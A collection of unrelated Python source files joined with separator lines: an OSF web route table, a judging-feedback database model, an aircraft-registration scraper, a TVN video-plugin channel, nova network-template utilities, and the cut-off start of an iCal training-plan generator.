project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
# Statistics
Rule(
[
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
],
'get',
project_views.node.project_statistics_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
OsfWebRenderer('project/statistics.mako', trust=False)
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
#api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/pointers/move/',
],
'post',
project_views.node.move_pointers,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
Rule(
[
'/folder/<pid>/pointer/<pointer_id>',
],
'delete',
project_views.node.remove_pointer_from_folder,
json_renderer,
),
Rule([
'/project/<pid>/get_summary/',
'/project/<pid>/node/<nid>/get_summary/',
], 'get', project_views.node.get_summary, json_renderer),
# TODO: [#OSF-6557] Route "get_children" is deprecated. Use get_readable_descendants.
Rule([
'/project/<pid>/get_children/',
'/project/<pid>/node/<nid>/get_children/',
'/project/<pid>/get_readable_descendants/',
'/project/<pid>/node/<nid>/get_readable_descendants/',
], 'get', project_views.node.get_readable_descendants, json_renderer),
Rule([
'/project/<pid>/get_forks/',
'/project/<pid>/node/<nid>/get_forks/',
], 'get', project_views.node.get_forks, json_renderer),
Rule([
'/project/<pid>/get_registrations/',
'/project/<pid>/node/<nid>/get_registrations/',
], 'get', project_views.node.get_registrations, json_renderer),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/fork/',
'/project/<pid>/node/<nid>/fork/',
], 'post', project_views.node.node_fork_page, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# View forks
Rule([
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
], 'get', project_views.node.node_forks, json_renderer),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
'/project/<pid>/node/<nid>/beforeregister',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/register/<template>/',
'/project/<pid>/node/<nid>/register/<template>/',
], 'get', project_views.register.node_register_template_page, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'get',
project_views.register.node_identifiers_get,
json_renderer,
),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
project_views.register.node_identifiers_post,
json_renderer,
),
# Statistics
Rule([
'/project/<pid>/statistics/',
'/project/<pid>/node/<nid>/statistics/',
], 'get', project_views.node.project_statistics, json_renderer),
# Permissions
Rule([
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
], 'post', project_views.node.project_set_privacy, json_renderer),
Rule([
'/project/<pid>/permissions/beforepublic/',
'/project/<pid>/node/<nid>/permissions/beforepublic/',
], 'get', project_views.node.project_before_set_public, json_renderer),
### Watching ###
Rule([
'/project/<pid>/watch/',
'/project/<pid>/node/<nid>/watch/'
], 'post', project_views.node.watch_post, json_renderer),
Rule([
'/project/<pid>/unwatch/',
'/project/<pid>/node/<nid>/unwatch/'
], 'post', project_views.node.unwatch_post, json_renderer),
Rule([
'/project/<pid>/togglewatch/',
'/project/<pid>/node/<nid>/togglewatch/'
], 'post', project_views.node.togglewatch_post, json_renderer),
# Combined files
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/'
],
'get',
project_views.file.collect_file_trees,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('website/addons')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
|
from datetime import datetime
from enum import Enum
from json import dumps
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy_utils import ChoiceType as EnumType
db = SQLAlchemy()
class JudgeStatus(Enum):
    """Lifecycle states of a judging job, stored as integers in the DB."""
    PENDING = 0    # queued, not yet picked up by a worker
    STARTED = 1    # a worker is running the job
    FAILED = 2     # terminated with an error
    FINISHED = 3   # completed successfully
class JudgeFeedback(db.Model):
    """Progress/result record for a single judged submission.

    Serialized to JSON via ``str(instance)`` for the client; ``updated`` is
    bumped automatically on every attribute assignment (see ``__setattr__``).
    """
    __tablename__ = "feedback"
    # Primary key: the submission's file name. TODO: UUID
    filename = db.Column(db.String(36), primary_key=True)  # TODO: UUID
    # Index of the test case currently being judged.
    cur_idx = db.Column(db.Integer, default=0)
    # Total number of test cases for this submission.
    max_idx = db.Column(db.Integer, nullable=False)
    # Judge state, persisted as an integer column via ChoiceType.
    status = db.Column(
        EnumType(
            JudgeStatus,
            impl=db.Integer(),
        ),
        default=JudgeStatus['PENDING'],
    )
    cur_json_idx = db.Column(db.Integer, default=0)
    # Outputs of the failing test case, if any (truncated to 1024 chars).
    expected_output = db.Column(db.String(1024), nullable=True)
    actual_output = db.Column(db.String(1024), nullable=True)
    created = db.Column(db.DateTime, default=datetime.now)
    # No column default: kept current by __setattr__ below.
    updated = db.Column(db.DateTime, nullable=False)
    def __setattr__(self, key, value):
        # Touch `updated` on EVERY attribute write. NOTE(review): this also
        # fires for SQLAlchemy-internal attributes (e.g. _sa_instance_state)
        # and clobbers any explicit assignment to `updated` — confirm intended.
        super().__setattr__(key, value)
        super().__setattr__('updated', datetime.now())
    def __str__(self):
        """Return a pretty-printed JSON view of the non-private, non-None fields."""
        output = {}
        for key in self.__dict__:
            if key[0] == '_':
                # Skip private/SQLAlchemy bookkeeping attributes.
                pass
            elif key in ('updated', 'created', 'status'):
                # Non-JSON-serializable values are stringified.
                output[key] = str(getattr(self, key))
            elif key in ('expected_output', 'actual_output'):
                value = getattr(self, key)
                if value is not None:
                    output[key] = value # XXX: JudgeFeedback._Brrrrify(value)
            else:
                value = getattr(self, key)
                if value is not None:
                    output[key] = value
        return dumps(output, sort_keys=True, indent=2)
    @staticmethod
    def _Brrrrify(inputs, before='\n', after='<br>', ignores=('\r',)):
        """please god save us."""
        # Replace every `before` char with `after` and drop every char in
        # `ignores` (i.e. turn newlines into <br> tags, strip carriage returns).
        inputs = list(inputs)
        while inputs.count(before):
            inputs[inputs.index(before)] = after
        for ign in ignores:
            while inputs.count(ign):
                inputs.remove(ign)
        return ''.join(inputs)
def monkeypatch_db_celery(app, celery):
    """Wrap the Celery base task class so each task body runs inside the
    Flask application context (required for DB access from tasks).

    ``celery.Task`` is replaced in place; the original base class stays the
    parent, so all other task behaviour is unchanged.
    """
    base_task_cls = celery.Task

    class ContextTask(base_task_cls):
        # Abstract: Celery must not register this wrapper class itself.
        abstract = True

        def __call__(self, *task_args, **task_kwargs):
            # Enter the app context, then delegate to the original task body.
            with app.app_context():
                return base_task_cls.__call__(self, *task_args, **task_kwargs)

    celery.Task = ContextTask
|
"""
Module for harvesting data from the
Gatwick Aviation Society (GAS) aircraft database
DO NOT USE
"""
# Imports
import requests
from bs4 import BeautifulSoup
from db.pghandler import Connection
# Constants
GAS_URL = "http://www.gatwickaviationsociety.org.uk/modeslookup.asp"
GAS_FIELDS = {"Registration": "registration",
"DICAOType": "icaotype",
"DType": "type",
"DSerial": "serial",
"DOperator": "operator",
"DICAOOperator": "icaooperator",
"DSubOperator": "suboperator"}
def downloadGASPage(icao24):
    """
    Query the GAS database for a single transponder code.

    :param icao24: The ICAO24 Mode S transponder code
    :return: The ``requests`` response object of the POST
    """
    # The search form expects every field to be present, but only the
    # Mode S code and the submit button carry a value.
    form_data = {field: "" for field in GAS_FIELDS}
    form_data["MSC"] = icao24
    form_data["Submit2"] = "Find"
    request_headers = {
        "Host": "www.gatwickaviationsociety.org.uk",
        "Accept": "text/static,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Referer": "http://www.gatwickaviationsociety.org.uk/modeslookup.asp",
    }
    return requests.post(GAS_URL, headers=request_headers, data=form_data)
def getMissingICAO24Codes():
    """
    List ICAO24 codes whose aircraft rows have not been populated yet.

    A row without a registration is considered "missing".

    :return: A list of ICAO24 Mode S transponder codes
    """
    query = "SELECT icao24 FROM aircraft WHERE registration IS NULL"
    with Connection() as con:
        rows = con.selectAll(query)
        return [row[0] for row in rows]
def extractData(rawtext):
    """
    Extract aircraft field values from the GAS result page.

    :param rawtext: The HTML text to extract from
    :return: dict mapping each GAS field name to the value found in the
             HTML, or ``None`` when the field's input element (or its
             ``value`` attribute) is missing
    """
    soup = BeautifulSoup(rawtext, "lxml")
    values = {}
    for key in GAS_FIELDS:
        element = soup.find("input", id=key)
        # Robustness fix: previously a missing input element raised
        # TypeError (None is not subscriptable) and a missing "value"
        # attribute raised KeyError; both now yield None instead.
        if element is not None and element.has_attr("value"):
            values[key] = element["value"]
        else:
            values[key] = None
    return values
def storeData(icao24, data):
    """
    Update the aircraft row for *icao24* with the scraped field values.

    Empty values are stored as SQL NULL, except Registration, which is kept
    as an empty string so the row stops matching getMissingICAO24Codes().

    :param icao24: The ICAO24 Mode S transponder code
    :param data: Dictionary keyed by GAS field names
    :return: None
    """
    # NOTE(review): values are interpolated into the SQL text because the
    # Connection wrapper's parameter-binding support is unknown here.
    # Single quotes are escaped so scraped values can no longer break the
    # statement (or inject SQL); prefer real parameterized queries if
    # Connection.execute() supports them.
    assignments = []
    for key in GAS_FIELDS:
        column = GAS_FIELDS[key]
        value = data[key]
        if value is None or (value == '' and key != "Registration"):
            literal = "NULL"
        else:
            literal = "'%s'" % value.replace("'", "''")
        assignments.append("%s=%s" % (column, literal))
    sql = "UPDATE aircraft SET %s WHERE icao24='%s'" % (",".join(assignments), icao24)
    with Connection(autocommit=True) as con:
        con.execute(sql)
def harvestGAS():
    """
    GAS Harvest Base function, for use in bot.app.main.

    Processes at most one missing ICAO24 code per invocation.

    :return: A dictionary with keys success (boolean) and message (string)
    """
    codes = getMissingICAO24Codes()
    if not codes:
        return {"success": True,
                "message": "All aircraft already stored in database."}
    code = codes[0]
    response = downloadGASPage(code)
    data = extractData(response.text)
    storeData(code, data)
    if data["Registration"] == "Not Found":
        message = "No aircraft found for ICAO24 code %s" % code
    else:
        message = "Aircraft %s found for ICAO24 code %s." % (data["Registration"], code)
    return {"success": True,
            "message": message}
# Allow running the harvester directly as a one-shot script.
if __name__ == "__main__":
    harvestGAS()
|
# -*- coding: utf-8 -*-
#------------------------------------------------------------
# tvalacarta - XBMC Plugin
# Canal para TVN (Chile)
# http://blog.tvalacarta.info/plugin-xbmc/tvalacarta/
#------------------------------------------------------------
import urlparse,re
import urllib
from core import logger
from core import config
from core import scrapertools
from core.item import Item
DEBUG = False
CHANNELNAME = "tvn"
def isGeneric():
    """Declare that this channel supports the generic tvalacarta interface."""
    return True
def mainlist(item):
    """Build the top-level category menu for the TVN channel."""
    logger.info("tvalacarta.channels.tvn mainlist")
    # (menu title, site section slug) pairs; every entry points at the
    # same player URL and is expanded later by programas().
    categories = [
        ("Teleseries", "teleseries"),
        ("Entretención", "entretencion"),
        ("Series", "series"),
        ("Docurrealidad", "docurrealidad"),
        ("Cultura", "cultura"),
    ]
    itemlist = []
    for category_title, category_extra in categories:
        itemlist.append(Item(channel=CHANNELNAME, title=category_title,
                             action="programas", url="http://www.tvn.cl/player/",
                             extra=category_extra, folder=True))
    return itemlist
def programas(item):
    """List the programs (shows) inside one category menu."""
    logger.info("tvalacarta.channels.tvn programas")
    itemlist = []
    #http://www.tvn.cl/cultura/menuportadaplayer/?service=blank
    # Extract the show list from the category's menu page
    data = scrapertools.cachePage("http://www.tvn.cl/"+item.extra+"/menuportadaplayer/?service=blank")
    logger.info("data="+data.strip())
    # Each show is a plain <li><a href>title</a> entry
    patron = '<li><a href="([^"]+)">([^<]+)<'
    matches = re.compile(patron,re.DOTALL).findall(data)
    if DEBUG: scrapertools.printMatches(matches)
    for scrapedurl,scrapedtitle in matches:
        title = scrapedtitle.strip()
        thumbnail = ""
        plot = ""
        # Resolve relative links against the player URL
        url = urlparse.urljoin(item.url,scrapedurl)
        if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
        itemlist.append( Item( channel=item.channel , title=title , action="episodios" , url=url , thumbnail=thumbnail , plot=plot , show=title , fanart=thumbnail , folder=True ) )
    return itemlist
def episodios(item):
    """List the episodes of one program page."""
    logger.info("tvalacarta.channels.tvn episodios")
    itemlist=[]
    '''
    <article class="ventana3 efecto-hover">
    <img src="http://www.tvn.cl/incoming/article566557.ece/ALTERNATES/w300/cumbres_170313.jpg" alt="Lhasa la ciudad prohibida"/>
    <a href="/player/play/?id=566567&s=8959">
    <div class="mask">
    <h5><span></span>Cumbres del Mundo</h5>
    <h3>Capítulo 11</h3>
    <h2>Lhasa la ciudad prohibida</h2>
    </div>
    </a>
    </article>
    '''
    # Extract the episodes; the pattern mirrors the sample markup above
    # ([^<]+ spans the whitespace/attributes between consecutive tags).
    data = scrapertools.cachePage(item.url)
    patron  = '<article class="ventana3 efecto-hover"[^<]+'
    patron += '<img src="([^"]+)"[^<]+'
    patron += '<a href="([^"]+)"[^<]+'
    patron += '<div class="mask"[^<]+'
    patron += '<h5><span></span>([^<]+)</h5[^<]+'
    patron += '<h3>([^<]+)</h3[^<]+'
    patron += '<h2>([^<]+)</h2>'
    matches = re.compile(patron,re.DOTALL).findall(data)
    if DEBUG: scrapertools.printMatches(matches)
    for scrapedthumbnail,scrapedurl,scrapedshow,scrapedepisode,scrapedtitle in matches:
        # Title combines episode number ("Capítulo N") and episode name
        title = scrapedepisode.strip()+" - "+scrapedtitle.strip()
        thumbnail = urlparse.urljoin(item.url,scrapedthumbnail)
        plot = ""
        url = urlparse.urljoin(item.url,scrapedurl)
        if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]")
        itemlist.append( Item( channel=item.channel , title=title , action="play" , server="tvn" , url=url , thumbnail=thumbnail , plot=plot , show=title , fanart=thumbnail , folder=False ) )
    return itemlist
# Verificación automática de canales: Esta función debe devolver "True" si todo está ok en el canal.
def test():
# El canal tiene estructura
items_mainlist = mainlist(Item())
items_programas = []
# Todas las opciones del menu tienen que tener algo
for item_mainlist in items_mainlist:
exec "itemlist="+item_mainlist.action+"(item_mainlist)"
if len(itemlist)==0:
print "La sección '"+item_mainlist.title+"' no devuelve nada"
return False
items_programas = itemlist
# Ahora recorre los programas hasta encontrar vídeos en alguno
for item_programa in items_programas:
print "Verificando "+item_programa.title
items_episodios = episodios(item_programa)
if len(items_episodios)>0:
return True
print "No hay videos en ningún programa"
return False
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Network-releated utilities for supporting libvirt connection code."""
import netaddr
from nova.openstack.common import cfg
CONF = cfg.CONF
CONF.import_opt('use_ipv6', 'nova.config')
CONF.import_opt('injected_network_template', 'nova.virt.disk.api')
# Cheetah is loaded lazily: it is only needed when a network template is
# actually rendered (see get_injected_network_template).
Template = None
def _late_load_cheetah():
    """Import Cheetah's Template class on first use (idempotent)."""
    global Template
    if Template is None:
        # level=-1 selects Python 2's implicit relative-then-absolute
        # import behaviour.
        t = __import__('Cheetah.Template', globals(), locals(),
                       ['Template'], -1)
        Template = t.Template
def get_net_and_mask(cidr):
    """Return (address, dotted netmask) strings for a CIDR string."""
    network = netaddr.IPNetwork(cidr)
    return str(network.ip), str(network.netmask)
def get_net_and_prefixlen(cidr):
    """Return (address, prefix length) strings for a CIDR string,
    e.g. ('192.168.0.1', '24')."""
    net = netaddr.IPNetwork(cidr)
    # Use the public ``prefixlen`` property instead of the private
    # ``_prefixlen`` attribute; the value is identical.
    return str(net.ip), str(net.prefixlen)
def get_ip_version(cidr):
    """Return the IP version (4 or 6) of *cidr* as an int."""
    return int(netaddr.IPNetwork(cidr).version)
def get_injected_network_template(network_info, use_ipv6=CONF.use_ipv6,
                                  template=CONF.injected_network_template):
    """
    return a rendered network template for the given network_info

    :param network_info:
        :py:meth:`~nova.network.manager.NetworkManager.get_instance_nw_info`
    Note: this code actually depends on the legacy network_info, but will
    convert the type itself if necessary.

    Returns None when no network is marked for injection or when no
    template path is configured.

    NOTE(review): the keyword defaults are captured from CONF at import
    time, not per call — confirm this is intended.
    """
    # the code below depends on the legacy 'network_info'
    if hasattr(network_info, 'legacy'):
        network_info = network_info.legacy()
    nets = []
    ifc_num = -1
    have_injected_networks = False
    for (network_ref, mapping) in network_info:
        # Interface numbering counts every network, including skipped ones,
        # so device names stay aligned with the instance's NIC order.
        ifc_num += 1
        if not network_ref['injected']:
            continue
        have_injected_networks = True
        # Only the first address of each interface is injected.
        address = mapping['ips'][0]['ip']
        netmask = mapping['ips'][0]['netmask']
        address_v6 = None
        gateway_v6 = None
        netmask_v6 = None
        if use_ipv6:
            address_v6 = mapping['ip6s'][0]['ip']
            netmask_v6 = mapping['ip6s'][0]['netmask']
            gateway_v6 = mapping['gateway_v6']
        net_info = {'name': 'eth%d' % ifc_num,
                    'address': address,
                    'netmask': netmask,
                    'gateway': mapping['gateway'],
                    'broadcast': mapping['broadcast'],
                    'dns': ' '.join(mapping['dns']),
                    'address_v6': address_v6,
                    'gateway_v6': gateway_v6,
                    'netmask_v6': netmask_v6}
        nets.append(net_info)
    if have_injected_networks is False:
        return None
    if not template:
        return None
    # Cheetah is imported lazily; see _late_load_cheetah.
    _late_load_cheetah()
    ifc_template = open(template).read()
    return str(Template(ifc_template,
                        searchList=[{'interfaces': nets,
                                     'use_ipv6': use_ipv6}]))
|
"""
A simple program to write an iCal file to create a calendar for the Low Volume Base
Training Plan for trainerroad.com
-Justin Deardorff 2015
"""
import re
import datetime
from datetime import timedelta
#defining iCal pieces for header, footer, and events
header = ["BEGIN:VCALENDAR\n",
          "VERSION:2.0\n",
